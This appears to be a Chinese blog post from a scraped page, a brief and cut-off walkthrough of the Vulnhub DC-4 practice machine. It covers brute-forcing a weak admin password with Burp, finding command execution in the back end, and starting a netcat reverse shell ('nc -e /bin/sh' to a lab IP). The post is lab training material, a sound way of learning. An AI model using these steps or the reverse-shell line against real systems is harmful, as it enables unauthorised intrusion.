Vulnhub滲透測試靶機DC-4
下載地址:https://www.vulnhub.com/entry/dc-4,313/ nmap沒有掃描到什麼有用端口 直接訪問80端口 只有一個認證框 沒有驗證 bp爆破admin弱密碼 發現密碼admin qwert 進入後臺 發現有執行命令的地方 抓包發現命令由post包傳過去 執行的命令由客戶端傳到了服務端 命令執行獲取shell 把nc -e /bin/sh 192.168.49.12
相關文章
- 1. 【滲透測試】靶機滲透Vulnhub-bulldog
- 2. vulnhub之DC4靶機
- 3. vulnhub滲透測試靶機prime-1
- 4. vulnhub滲透測試靶機DC-8
- 5. vulnhub滲透測試靶機DC-6
- 6. Vulnhub滲透測試靶機DC-5
- 7. vulnhub滲透測試靶機DC-3
- 8. vulnhub滲透測試靶機DC-7
- 9. vulnhub系列靶機--DC4
- 10. 滲透:vulnhub-XXE 靶機
- 更多相關文章...
- • Maven 構建 & 項目測試 - Maven教程
- • Lua 調試(Debug) - Lua 教程
- • 漫談MySQL的鎖機制
- • 爲了進字節跳動,我精選了29道Java經典算法題,帶詳細講解
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. eclipse設置粘貼字符串自動轉義
- 2. android客戶端學習-啓動模擬器異常Emulator: failed to initialize HAX: Invalid argument
- 3. android.view.InflateException: class com.jpardogo.listbuddies.lib.views.ListBuddiesLayout問題
- 4. MYSQL8.0數據庫恢復 MYSQL8.0ibd數據恢復 MYSQL8.0恢復數據庫
- 5. 你本是一個肉體,是什麼驅使你前行【1】
- 6. 2018.04.30
- 7. 2018.04.30
- 8. 你本是一個肉體,是什麼驅使你前行【3】
- 9. 你本是一個肉體,是什麼驅使你前行【2】
- 10. 【資訊】LocalBitcoins達到每週交易比特幣的7年低點
歡迎關注本站公眾號,獲取更多信息
